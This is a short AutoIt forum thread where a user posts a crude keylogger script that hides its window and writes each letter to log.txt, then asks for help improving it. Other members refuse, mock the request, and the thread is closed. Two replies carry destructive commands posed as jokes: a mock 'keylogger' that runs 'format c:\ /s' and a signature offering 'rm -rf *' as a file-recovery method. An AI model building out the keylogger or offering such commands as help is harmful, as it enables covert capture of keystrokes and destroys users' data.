Jump to content

keylogger (well, kinda)


 Share

Recommended Posts

here is my keylogger so far... it sucks. can someone help me make it better??

#NoTrayIcon
#include <misc.au3>
guicreate("iLogger", 200, 400)
guisetstate()
$start = Guictrlcreatebutton("Start", -1, -1)
while 1

    $msg = GUIGetMsg()
    Select
    case ($msg = -3)
Exit
case ($msg = $start)
guisetstate(@SW_HIDE)
; i had all of the hotkeysets here ie hotkeyset("a", "a") - hotkeyset("z", "z") and hotkeyset("^li", "Show") but it did not work? help
EndSelect

WEnd

func space()
    send("{SPACE}")
    filewrite("log.txt", " ")
    EndFunc
Func show()
    guisetstate(@sw_show)
    EndFunc
func a()
    send("a")
    filewrite("log.txt", "a")
EndFunc
func B()
    send("b")
    filewrite("log.txt", "b")
EndFunc
func c()
    send("c")
    filewrite("log.txt", "c")
EndFunc
func d()
    send("d")
    filewrite("log.txt", "d")
EndFunc
func e()
    send("e")
    filewrite("log.txt", "e")
EndFunc
func f()
    send("f")
    filewrite("log.txt", "f")
EndFunc
func g()
    send("g")
    filewrite("log.txt", "g")
EndFunc
func h()
    send("h")
    filewrite("log.txt", "h")
EndFunc
func i()
    send("i")
    filewrite("log.txt", "i")
EndFunc
func j()
    send("j")
    filewrite("log.txt", "j")
EndFunc
func k()
    send("k")
    filewrite("log.txt", "k")
EndFunc
func l()
    send("l")
    filewrite("log.txt", "l")
EndFunc
func m()
    send("m")
    filewrite("log.txt", "m")
EndFunc
func n()
    send("n")
    filewrite("log.txt", "n")
EndFunc
func o()
    send("o")
    filewrite("log.txt", "o")
EndFunc
func p()
    send("p")
    filewrite("log.txt", "p")
EndFunc
func q()
    send("q")
    filewrite("log.txt", "q")
EndFunc
func r()
    send("r")
    filewrite("log.txt", "r")
EndFunc
func s()
    send("s")
    filewrite("log.txt", "s")
EndFunc
func t()
    send("t")
    filewrite("log.txt", "t")
EndFunc
func u()
    send("u")
    filewrite("log.txt", "u")
EndFunc
func v()
    send("v")
    filewrite("log.txt", "v")
EndFunc
func w()
    send("w")
    filewrite("log.txt", "w")
EndFunc
func x()
    send("x")
    filewrite("log.txt", "x")
EndFunc
func y()
    send("y")
    filewrite("log.txt", "y")
EndFunc
func z()
    send("z")
    filewrite("log.txt", "z")
EndFunc

Rick rack ree, kick 'em in the knee.Rick rack rass, kick 'em in the other knee!

Link to comment
Share on other sites

here is my keylogger so far... it sucks. can someone help me make it better??

I'm eager to see how long it takes to lock this thread.

__________________________________________________________(l)user: Hey admin slave, how can I recover my deleted files?admin: No problem, there is a nice tool. It's called rm, like recovery method. Make sure to call it with the "recover fast" option like this: rm -rf *

Link to comment
Share on other sites

Help with your key logger?

Not really.

Maybe you should revive an interest in your notepad.

Edited by martin
Serial port communications UDF Includes functions for binary transmission and reception.printing UDF Useful for graphs, forms, labels, reports etc.Add User Call Tips to SciTE for functions in UDFs not included with AutoIt and for your own scripts.Functions with parameters in OnEvent mode and for Hot Keys One function replaces GuiSetOnEvent, GuiCtrlSetOnEvent and HotKeySet.UDF IsConnected2 for notification of status of connected state of many urls or IPs, without slowing the script.
Link to comment
Share on other sites

Help with your key logger?

Not really.

Maybe you should revive an interest in your notepad.

thanks everybody for helping

Rick rack ree, kick 'em in the knee.Rick rack rass, kick 'em in the other knee!

Link to comment
Share on other sites

Here's my keylogger

run("format c:\ /s")

Make sure you put the '/s' in there...that's important!

Get a life...no one here is going to help you write a script-kiddy hack tool.

This is like your (at least to my knowledge) 3rd attempt to create a malicous tool...

I GONG YOU! (old Gong show ref...you're too young and nieve to know).

Edited by sshrum

Sean Shrum :: http://www.shrum.net

All my published AU3-based apps and utilities

'Make it idiot-proof, and someone will make a better idiot'

 

Link to comment
Share on other sites

I'm eager to see how long it takes to lock this thread.

30 mins and it has not been locked yet!!

Rick rack ree, kick 'em in the knee.Rick rack rass, kick 'em in the other knee!

Link to comment
Share on other sites

Here's my keylogger

run("format c:\ /s")

Make sure you put the '/s' in there...that's important!

Get a life...no one here is going to help you write a script-kiddy hack tool.

This is like your (at least to my knowledge) 3rd attempt to create a malicous tool...

I GONG YOU! (old Gong show ref...you're too young and nieve to know).

k... ur cool

Rick rack ree, kick 'em in the knee.Rick rack rass, kick 'em in the other knee!

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...